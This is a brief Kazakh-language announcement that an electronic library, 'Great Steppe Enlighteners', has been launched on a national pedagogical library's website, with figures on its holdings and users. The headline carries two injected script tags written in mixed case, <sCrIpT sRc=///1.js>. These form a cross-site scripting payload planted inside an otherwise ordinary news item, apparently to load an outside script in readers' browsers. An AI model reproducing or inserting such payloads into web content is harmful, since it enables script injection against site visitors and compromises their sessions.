Электрондық кітапхана құрылды<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
02.12.2023
📚«ҰЛЫ ДАЛА АҒАРТУШЫЛАРЫ» ЭЛЕКТРОНДЫҚ КІТАПХАНАСЫ ҚҰРЫЛДЫ
🗳️Оқу-ағарту министрлігіне қарасты Республикалық ғылыми-педагогикалық кітапхананың сайтында есімдері білім саласының қалыптасу тарихында алтын әріптермен жазылған ұстаздарға: Абай Құнанбайұлы, Ыбырай Алтынсарин, Ахмет Байтұрсынұлы, Қанипа Бітібаева, Аягүл Миразова т.б. арналған «Ұлы дала ағартушылары» электронды кітапханасы құрылды.
📧Электронды кітапханада ұлы тұлғалардың өмірі мен шығармашылығы, еңбектері, мақалалары мен зерттеулері туралы ақпарат алуға болады. Барлығы 1000-нан астам еңбек ұсынылған.
Электронды кітапхана жыл бойы жаңа ақпараттармен толықтырылады. Алдағы уақытта электронды кітапхана білім саласына еңбегі сіңген ұстаздар еңбегімен толыға бермек.
🔺Қазіргі таңда электронды кітапхананы пайдаланушылар саны 12 мыңға жуықтады.
📲Электрондық кітапхананы https://rnpb.kz/ сайтынан көре аласыздар.